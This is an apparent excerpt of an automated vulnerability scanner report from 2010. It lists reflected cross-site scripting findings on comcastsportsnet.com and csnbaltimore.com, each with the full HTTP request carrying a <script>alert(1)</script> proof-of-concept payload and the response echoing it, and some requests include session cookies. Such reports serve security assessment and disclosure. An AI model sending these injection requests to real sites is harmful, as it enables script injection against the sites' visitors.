Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55ff1<script>alert(1)</script>3b3a53d4fc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php"</strong>
...[SNIP]...

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3544c<script>alert(1)</script>c22839dba9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:43 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c"</strong>
...[SNIP]...

2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 235bb<script>alert(1)</script>3097e54bcbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/235bb<script>alert(1)</script>3097e54bcbb HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:41 GMT
Content-Length: 776
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/235bb<script>alert(1)</script>3097e54bcbb"</strong>
...[SNIP]...

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3384<script>alert(1)</script>cb66b36a9e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf3384<script>alert(1)</script>cb66b36a9e6/main HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesf3384<script>alert(1)</script>cb66b36a9e6/main"</strong>
...[SNIP]...

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0707<script>alert(1)</script>573843f4b66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/mainc0707<script>alert(1)</script>573843f4b66 HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/mainc0707<script>alert(1)</script>573843f4b66"</strong>
...[SNIP]...

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload daf8e<script>alert(1)</script>e5f3917f7f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:54 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9"</strong>
...[SNIP]...

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 34164<script>alert(1)</script>0648d394dfc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:57 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc"</strong>
...[SNIP]...

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b173<script>alert(1)</script>8c0b83a496b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b"</strong>
...[SNIP]...

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/12/10/Ravens-Texans-The-basics/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb8c0<script>alert(1)</script>2ad29b4003b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 804
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b"</strong>
...[SNIP]...

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Franklin-finally-heads-to-Vandy/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75610<script>alert(1)</script>2b8065799c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:59 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8"</strong>
...[SNIP]...

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/New-sports-arena-for-Baltimore-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4947<script>alert(1)</script>b18abeac900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900"</strong>
...[SNIP]...

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Will-Ravens-respond-to-Saints/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a08ac<script>alert(1)</script>3fd554facc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 809
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0"</strong>
...[SNIP]...

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3db20<script>alert(1)</script>bb2d756dbfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb"</strong>
...[SNIP]...

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77970<script>alert(1)</script>52d6f2862ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce"</strong>
...[SNIP]...

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2fad<script>alert(1)</script>b7678c4d177 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 815
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177"</strong>
...[SNIP]...

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dbfd4<script>alert(1)</script>a999fa7914c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c"</strong>
...[SNIP]...

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 482cc<script>alert(1)</script>7bb299f040c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:09 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
